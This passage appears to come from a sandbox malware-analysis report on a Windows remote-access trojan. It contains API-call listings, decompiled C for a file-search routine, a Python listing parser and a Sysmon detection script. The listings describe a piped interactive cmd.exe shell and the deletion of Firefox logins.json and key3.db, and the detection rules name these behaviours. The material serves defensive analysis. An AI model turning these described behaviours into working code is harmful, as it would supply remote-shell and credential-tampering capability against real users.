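"• <api>.<MODULE>(<args>), ref: <addr>" lines, strips MSVCP60
std::basic_string plumbing, and collects resolved string arguments.
"""
import re
from collections import Counter

# One listed call: optional bullet, optional "Part of subcall function XXXXXXXX:",
# "<mangled or plain name>.<MODULE>", optional "(args)", then "ref: <addr>".
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_ID_RE = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<ids>.*?)\s*$")
# Assumption: an 8-hex-digit token (optionally negative) is an address or immediate,
# anything else that is not "?" is a string the disassembler resolved.
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")
STD_STRING_MODULE = "MSVCP60"   # std::basic_string plumbing: noise for behaviour triage


def parse_calls(lines):
    """Return one dict per call line, in listing order."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def behaviour_skeleton(calls):
    """Win32/CRT calls in listing order with the std::string operators removed."""
    return [f'{c["name"]}.{c["module"]}' for c in calls if c["module"] != STD_STRING_MODULE]


def literal_args(calls):
    """Resolved string arguments (e.g. C2 status tokens, file names), first-seen order."""
    out = []
    for c in calls:
        for a in c["args"]:
            if a != "?" and not HEX_RE.match(a) and a not in out:
                out.append(a)
    return out


def parse_string_ids(lines):
    """The '$'-separated tokens of the 'String ID:' line, if present."""
    for line in lines:
        m = STRING_ID_RE.match(line)
        if m:
            return m.group("ids").split("$")
    return []


def summarize(lines):
    calls = parse_calls(lines)
    return {
        "calls": len(calls),
        "modules": dict(Counter(c["module"] for c in calls)),
        "skeleton": behaviour_skeleton(calls),
        "literals": literal_args(calls),
        "string_ids": parse_string_ids(lines),
    }


# Sample input: lines copied from the file-search function listing in the report.
SAMPLE_LISTING = r"""
  • Part of subcall function 00403183: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
  • Part of subcall function 00403183: wcscmp.MSVCRT ref: 00403247
• ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00402FC7
  • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 004025C8
• FindClose.KERNEL32(000000FF,?,?,?), ref: 00403076
• ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchfinished,00415268,?,00415268,?), ref: 00403099
• atoi.MSVCRT ref: 00403101
• ExitThread.KERNEL32 ref: 00403177
• String ID: filefound$searchfinished$searchstarted$searchwrongpath
""".strip().splitlines()

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LISTING).items():
        print(f"{key}: {value}")
```

Run against a whole function block the skeleton reads as "enumerate a directory, compare names, send a status token over the socket, close the handle, exit the thread", which is the search command of the RAT without the string-class noise; the same helper applies unchanged to the other listings in this report.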

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,7313CB00,?,0040AD3E,?), ref: 0040E8EC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,758EFF80,00415268,7313CB00,?,0040AD3E,?), ref: 0040E904
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0040AD3E,?), ref: 0040E911
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,cmd.exe,?,0040AD3E,?), ref: 0040E920
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\,?), ref: 0040E933
                                          • CreatePipe.KERNEL32 ref: 0040E95B
                                          • GetStdHandle.KERNEL32 ref: 0040E98B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000044,?), ref: 0040E9B3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040E9C3
                                          • CreateProcessA.KERNEL32(00000000,00000000), ref: 0040E9CB
                                          • Sleep.KERNEL32(?,000001F4), ref: 0040E9DC
                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0040E9F6
                                          • ReadFile.KERNEL32(?,?,0000C350,00000000,00000000), ref: 0040EA15
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040EA39
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EA43
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EA4F
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000), ref: 0040EA71
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000,73115DF0), ref: 0040EA8C
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000002), ref: 0040EA9F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAA9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EAB5
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000000), ref: 0040EAC1
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000001), ref: 0040EADA
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,-00000002), ref: 0040EAEE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAF8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB42
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410C1C), ref: 0040EB51
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EB5F
                                          • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,73115DF0), ref: 0040EB79
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040EB87
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EB90
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB99
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,00000000), ref: 0040EBA4
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 0040EBB8
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0040EC0B
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040EC16
                                          • CloseHandle.KERNEL32(?), ref: 0040EC25
                                          • CloseHandle.KERNEL32(?), ref: 0040EC2A
                                          • CloseHandle.KERNEL32(?), ref: 0040EC37
                                          • CloseHandle.KERNEL32(?), ref: 0040EC3C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EC4E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,?,0000000D,0000000A,00415B80,0000003E), ref: 0040EC69
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,00000000,?), ref: 0040EC76
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000,?), ref: 0040EC83
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,00000000,?), ref: 0040EC8F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040EC9A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECA3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECAC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECB5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECBE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@V01@V?$basic_string@$??0?$basic_string@?find@?$basic_string@HandleV01@@$??4?$basic_string@CloseD@1@@Hstd@@$?substr@?$basic_string@V10@V12@$??8std@@?c_str@?$basic_string@CreatePipeProcessY?$basic_string@$?length@?$basic_string@?rfind@?$basic_string@FileNamedObjectPeekReadSingleSleepTerminateV10@0@Wait
                                          • String ID: C:\$D$cmd.exe
                                          • API String ID: 868804582-2369035250
                                          • Opcode ID: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                                          • Instruction ID: 6ad45e127cb324f962e26fd75bd9daacbf5f14a3686954285d58c0458e4bac89
                                          • Opcode Fuzzy Hash: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                                          • Instruction Fuzzy Hash: 01C13E7190411DEFDB14DBA0DC98EEE7B79FB44304F1084BAF506A61A0DB795E85CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,74B06490,00000000), ref: 004057C9
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,74B06490,00000000), ref: 004057D6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,74B06490,00000000), ref: 004057E3
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?,?,74B06490,00000000), ref: 004057F5
                                          • getenv.MSVCRT ref: 00405801
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,74B06490,00000000), ref: 0040580D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,00000000), ref: 00405819
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00405822
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 0040582B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?,?,?,00000000), ref: 00405845
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040584F
                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00405856
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00405862
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,00000000), ref: 00405870
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405886
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,?,?,00000000), ref: 004058A7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040594F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040595C
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405968
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405971
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040597A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405994
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059A1
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059AD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059B6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059BF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D0
                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405ADF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AE8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AF1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V01@@V10@$??4?$basic_string@FileFind$?c_str@?$basic_string@Y?$basic_string@$CloseDeleteEventFirstNextV10@@getenv
                                          • String ID: [Firefox StoredLogins cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 3561168790-1296180500
                                          • Opcode ID: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                                          • Instruction ID: 0f5345415a6924a010703aecf2afa4763ea68f99ba4dbc0389945dcd7f619004
                                          • Opcode Fuzzy Hash: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                                          • Instruction Fuzzy Hash: 15918F71A0014AAFDB10ABF0DC9D9EF7B79EB54304F048176E446A31A0EB7989C9CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%
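
Two of the listings above describe behaviour that is easy to detect on the host. The shell function builds the string "cmd.exe", calls CreatePipe and GetStdHandle, starts the child with CreateProcessA, then loops over Sleep, PeekNamedPipe and ReadFile before TerminateProcess: an interactive cmd.exe whose console is a pipe owned by the parent. The Firefox function reads UserProfile with getenv, enumerates \AppData\Roaming\Mozilla\Firefox\Profiles\ with FindFirstFileA/FindNextFileA, and calls DeleteFileA on \logins.json and \key3.db in each profile. The script below is an added example, not part of the report or of any vendor's rule set: it runs two detections over constructed Sysmon-style events (EventID 1 ProcessCreate, EventID 23/26 FileDelete, standard Sysmon field names). The events, the parent allow-list, the path C:\Users\user\Downloads\sample.exe and the profile folder name are assumptions made for the example.

```python
r"""Sysmon-style detections for the cmd.exe pipe shell and the Firefox
credential-store deletion seen in the listings above.

Added example (not part of the report or of any vendor rule set).
Events, parent allow-list and sample paths are constructed.
"""
from typing import Iterable

FIREFOX_STORE_FILES = {"logins.json", "key3.db"}        # names from the listing
FIREFOX_PROFILE_DIR = "\\mozilla\\firefox\\profiles\\"  # path from the listing, lowercased
# Assumption: parents that legitimately start a bare interactive cmd.exe.
INTERACTIVE_SHELL_PARENTS = {
    "explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
    "windowsterminal.exe", "conhost.exe",
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def firefox_store_deleted(ev: dict) -> bool:
    """FileDelete (23 or 26): logins.json / key3.db removed from a Firefox profile
    directory by anything other than firefox.exe."""
    if ev.get("EventID") not in (23, 26):
        return False
    target = ev.get("TargetFilename", "").lower()
    return (_basename(target) in FIREFOX_STORE_FILES
            and FIREFOX_PROFILE_DIR in target
            and _basename(ev.get("Image", "")) != "firefox.exe")


def headless_cmd_shell(ev: dict) -> bool:
    """ProcessCreate (1): cmd.exe started with no arguments, so its stdio can only
    be a pipe or console owned by the parent, by a parent that is not itself a
    shell or launcher. One-shot 'cmd.exe /c ...' is left to other rules."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) != "cmd.exe":
        return False
    tokens = ev.get("CommandLine", "").split()
    if len(tokens) != 1 or _basename(tokens[0].strip('"')) not in ("cmd.exe", "cmd"):
        return False
    return _basename(ev.get("ParentImage", "")) not in INTERACTIVE_SHELL_PARENTS


RULES = (
    ("firefox_store_deleted", firefox_store_deleted),
    ("headless_cmd_shell", headless_cmd_shell),
)


def scan(events: Iterable[dict]) -> list:
    """One hit per (event, rule) match, in event order."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append({"rule": name, "pid": ev.get("ProcessId"), "image": ev.get("Image"),
                             "detail": ev.get("TargetFilename") or ev.get("CommandLine")})
    return hits


# Constructed events. sample.exe and the profile folder name are hypothetical.
SAMPLE = "C:\\Users\\user\\Downloads\\sample.exe"
PROFILE = "C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\xxxxxxxx.default\\"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe", "ParentImage": SAMPLE},                              # hit
    {"EventID": 1, "ProcessId": 4124, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "ParentImage": SAMPLE},                    # one-shot, not this rule
    {"EventID": 1, "ProcessId": 4130, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
     "ParentImage": "C:\\Windows\\explorer.exe"},                                   # user-opened shell
    {"EventID": 23, "ProcessId": 3988, "Image": SAMPLE,
     "TargetFilename": PROFILE + "logins.json"},                                    # hit
    {"EventID": 23, "ProcessId": 3988, "Image": SAMPLE,
     "TargetFilename": PROFILE + "key3.db"},                                        # hit
    {"EventID": 23, "ProcessId": 2210, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "TargetFilename": PROFILE + "key3.db"},                                        # Firefox itself
    {"EventID": 23, "ProcessId": 3988, "Image": SAMPLE,
     "TargetFilename": "C:\\Users\\user\\Desktop\\logins.json"},                    # outside a profile
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The FileDelete rule keys on the two file names the sample concatenates, scoped to the profile directory it enumerates, so a user copying a logins.json to the desktop does not fire it; FileDelete logging (Sysmon events 23/26) must be enabled for the profile path for it to see anything. The shell rule deliberately ignores cmd.exe /c and /k, which belong to ordinary automation; what this sample does is keep a bare cmd.exe alive and read its output through a pipe, and that shape is rare outside terminals and IDEs, which is what the allow-list is for.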

                                          C-Code - Quality: 20%
                                          			E00403183(intOrPtr* __ecx, char _a4, char _a20) {
                                          				char _v5;
                                          				void* _v12;
                                          				char _v13;
                                          				char _v14;
                                          				void* _v32;
                                          				char _v48;
                                          				short _v64;
                                          				char _v80;
                                          				char _v96;
                                          				void* _v112;
                                          				char _v128;
                                          				char _v144;
                                          				char _v160;
                                          				void* _v176;
                                          				struct _WIN32_FIND_DATAW _v768;
                                          				char* _t79;
                                          				struct _WIN32_FIND_DATAW* _t95;
                                          				char* _t100;
                                          				void* _t103;
                                          				signed int _t106;
                                          				intOrPtr* _t149;
                                          				void* _t151;
                                          				void* _t153;
                                          				signed int _t157;
                                          
                                          				_t149 = __ecx;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				E00403646( &_v5,  &_v5,  &_v5, __imp__tolower);
                                          				L0040FC3E();
                                          				_t153 = _t151 + 0x1c;
                                          				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v768);
                                          				_v12 = FindFirstFileW( &_v64,  &_v64);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				if(_v12 == 0xffffffff) {
                                          					L11:
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					return 1;
                                          				}
                                          				if(FindNextFileW(_v12,  &_v768) == 0) {
                                          					L10:
                                          					FindClose(_v12);
                                          					goto L11;
                                          				}
                                          				do {
                                          					if((_v768.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v768.cFileName), ".") != 0 && wcscmp( &(_v768.cFileName), L"..") != 0) {
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                          						L0040FC38();
                                          						L0040FC44();
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						_t153 = _t153 + 0x18;
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						E00403183(_t149,  &_v64,  &_a20,  &_v64,  &_v80,  &_v80,  &_a4,  &(_v768.cFileName),  &(_v768.cFileName));
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					}
                                          					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v768.cFileName),  &_v14);
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					E00403646( &(_v768.cFileName),  &(_v768.cFileName),  &(_v768.cFileName), __imp__tolower);
                                          					_t153 = _t153 + 0x10;
                                          					_t79 =  &_a20;
                                          					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t79, 0);
                                          					if(_t79 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                          						_t95 =  &_v768;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t95, 0x250,  &_v13);
                                          						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t95);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						_t157 = _t153 - 0x10;
                                          						_t106 = _t157;
                                          						_t100 =  &_v128;
                                          						L0040FC1A();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						_t103 = E00402504( &_v144, _t106,  &_v144,  &_v144,  &_v96,  &_v96);
                                          						_t153 = _t157 + 0x44;
